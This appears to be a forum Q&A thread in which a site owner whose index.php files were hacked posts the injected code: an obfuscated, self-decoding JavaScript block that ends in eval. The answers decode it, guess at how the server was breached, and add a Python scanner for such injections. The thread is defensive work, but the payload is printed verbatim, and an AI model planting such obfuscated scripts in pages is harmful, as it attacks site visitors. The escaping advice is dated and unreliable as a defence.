All index.php files on my website got hacked with the code injection in the body tag, see below. Does anyone know how they did it, and if there is a way to look for it and how to prevent it?

echo "<body><script language="javascript">try { function BwrLMVnkPmRbZYpfwLH(MLJOynjaY){var iMgpLZHO="",aVwbJg,oKONbIZB,gdGJUWTs,siAOty,hPaiwMZ,NxynbqCA,VxXqcPIGHh,UclXTRxDsh,bRLAlhars;var nGBCFoc="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var OZymdhDIRb="";for(UclXTRxDsh=0;UclXTRxDsh<MLJOynjaY.length;){siAOty=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));hPaiwMZ=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));bRLAlhars=BwrLMVnkPmRbZYpfwLH;NxynbqCA=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));VxXqcPIGHh=nGBCFoc.indexOf(MLJOynjaY.charAt(UclXTRxDsh++));aVwbJg=(siAOty<<2)+(hPaiwMZ>>4);oKONbIZB=((hPaiwMZ&15)<<4)+(NxynbqCA>>2);gdGJUWTs=((NxynbqCA&3)<<6)+VxXqcPIGHh;bRLAlhars=bRLAlhars.toString();iMgpLZHO+=String.fromCharCode(aVwbJg);if(NxynbqCA!=64)iMgpLZHO+=String.fromCharCode(oKONbIZB);if(VxXqcPIGHh!=64)iMgpLZHO+=String.fromCharCode(gdGJUWTs);}bRLAlhars=bRLAlhars.replace(/\W/g,"");bRLAlhars=bRLAlhars.split("").reverse().join("");for(UclXTRxDsh=0;UclXTRxDsh<iMgpLZHO.length;UclXTRxDsh++)OZymdhDIRb+=String.fromCharCode(iMgpLZHO.charCodeAt(UclXTRxDsh%iMgpLZHO.length)^bRLAlhars.charCodeAt(UclXTRxDsh%bRLAlhars.length));return eval(OZymdhDIRb);}BwrLMVnkPmRbZYpfwLH("QnJpZEhETVl6b0xBVmxnBBQGRRsOBgYDAExOUgUHDzQhNwwcXScKNzUsCSY5ESwAChtrUAgOERIfBEpFekZbawESFQ8ICWE/MygED21USFF1WmleUWUKMwYgCAFBKxcIDws7aGdsUlZvUm9tZioUEwkuCEEBFAROVFJWOxYmOX5HSxVULyEBEGobPTl3BQ17CxMOUVdOdEJTRRQILhwFFioMfDY3CBp7URgDIRY2FzAFDzFaBgAcCAIPTEg=");} catch(e){}</script>";*
+4  A: 

I would suggest you use HTML Purifier.

HTML Purifier is a standards-compliant HTML filter library written in PHP. HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited, secure yet permissive whitelist, it will also make sure your documents are standards compliant.

Also, use the mysql_real_escape_string function on any values you want to insert/update into the database, and use intval on numbers to minimize the risk.

Sarfraz
+2  A: 

The JavaScript decodes and evals the following binary string:

0000: 2935 3f1e 1070 7a63 286e 6d69 626b 742b  )5?..pzc(nmibkt+
0010: 2037 6974 7d55 495b 4d50 0f45 6244 7154   7it}UI[MP.EbDqT
0020: 5b72 617d 4f55 7e5a 0e34 674d 6373 7767  [ra}OU~Z.4gMcswg
0030: 3937 1b2e 372a 4d40 7767 7c6e 0f5a 5f67  97..7*M@wg|n.Z_g
0040: 4c55 2124 2f1c 1c32 1a1a 2937 5e6b 6a43  LU!$/..2..)7^kjC
0050: 5d75 efbf bd4e 7367 4c79 5aef bfbd 0423  ]u...NsgLyZ....#
0060: 1a0c 2322 0820 0f4f 707c 4a5c 6929 4279  ..#". .Op|J\i)By
0070: 6b26 6c74 3b32 3538 5264 526a 1c15 0251  k&lt;258RdRj...Q
0080: 3c6b 6c78 6a25 736e 7d0f 7779 2367 705b  <klxj%sn}.wy#gp[
0090: 3923 291a 273f 205c 7262 6c62 5b63 640f  9#).'? \rblb[cd.
00a0: 726f 7a6e 233d 227b 5611 7e45 5348 575b  rozn#="{V.~ESHW[
00b0: 6936 6555 6e67 6461 2527 223e 3c2f 6b6c  i6eUngda%'"></kl
00c0: 786a 2573 6e7d 0f77 7923 6770 5b39 2329  xj%sn}.wy#gp[9#)
00d0: 1a27 3f3e                                .'?>

which seems a bit pointless, as most JavaScript engines should just throw a syntax error. Perhaps it causes an overflow in some browser.

As to how they actually did it: the code you posted is exploiting a client-side bug, and they probably compromised your server with an unrelated attack. It will depend on how your content is generated, but an SQL injection or filesystem overwrite are possible. Do you do anything like eval unescaped SQL or run dynamic exec-family functions from PHP?

p00ya
No, I don't have anything like that.
It could even be as simple as a brute-forced FTP or SSH login. Check the logs, perhaps? That's getting more into the realm of Server Fault.
p00ya
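The question also asks whether there is a way to look for this kind of injection. As an added example (not code from the thread), the following Python scanner walks a web root and flags script blocks that show the traits visible in the posted snippet: eval of a computed string, a long base64-looking literal, fromCharCode/charCodeAt XOR decoding, and an empty catch that swallows errors. The feature list, weights, threshold and sample strings are constructed for illustration and should be tuned for your own site.

```python
import re
import sys
from pathlib import Path

# One <script>...</script> block at a time (case-insensitive, may span lines).
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Constructed heuristics (name, regex, weight) for self-decoding injected JS; tune per site.
FEATURES = [
    ("eval_of_variable", re.compile(r"\beval\s*\(\s*[A-Za-z_$]"), 3),
    ("long_base64_literal", re.compile(r"[\"'][A-Za-z0-9+/]{80,}={0,2}[\"']"), 3),
    ("fromCharCode", re.compile(r"String\.fromCharCode"), 1),
    ("charCodeAt_xor", re.compile(r"charCodeAt\([^)]*\)\s*\^"), 2),
    ("swallowed_exception", re.compile(r"catch\s*\(\s*\w+\s*\)\s*\{\s*\}"), 2),
]
THRESHOLD = 6

def score_script(body):
    """Return (score, [matched feature names]) for the text of one script block."""
    hits = [name for name, rx, _ in FEATURES if rx.search(body)]
    return sum(w for name, _, w in FEATURES if name in hits), hits

def scan_text(text):
    """Return [(line_no, score, hits)] for each script block scoring >= THRESHOLD."""
    findings = []
    for m in SCRIPT_RE.finditer(text):
        score, hits = score_script(m.group(1))
        if score >= THRESHOLD:
            findings.append((text.count("\n", 0, m.start()) + 1, score, hits))
    return findings

def scan_tree(root, pattern="*.php"):
    """Walk root; map each file containing suspicious script blocks to its findings."""
    results = {}
    for path in Path(root).rglob(pattern):
        findings = scan_text(path.read_text(errors="replace"))
        if findings:
            results[str(path)] = findings
    return results

# Constructed samples: a mock-up modelled on the question's injection (not the real payload) and a benign page.
SAMPLE_INJECTED = ('<body><script language="javascript">try { function f(s){var o="",k="x";'
                   'for(var i=0;i<s.length;i++)o+=String.fromCharCode(s.charCodeAt(i)^k.charCodeAt(0));'
                   'return eval(o);}f("' + "QUJD" * 30 + '");} catch(e){}</script>')
SAMPLE_CLEAN = '<body><script src="/js/app.js"></script><p>hello</p>'

if __name__ == "__main__":  # usage: python scan_injected.py /var/www
    for path, findings in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for line_no, score, hits in findings:
            print(f"{path}:{line_no}: score={score} ({', '.join(hits)})")
```

A hit is a prompt to inspect the file and compare it against a known-good copy or backup, not proof on its own; legitimate minified libraries can trip some of these features, which is why they are weighted and thresholded rather than matched individually.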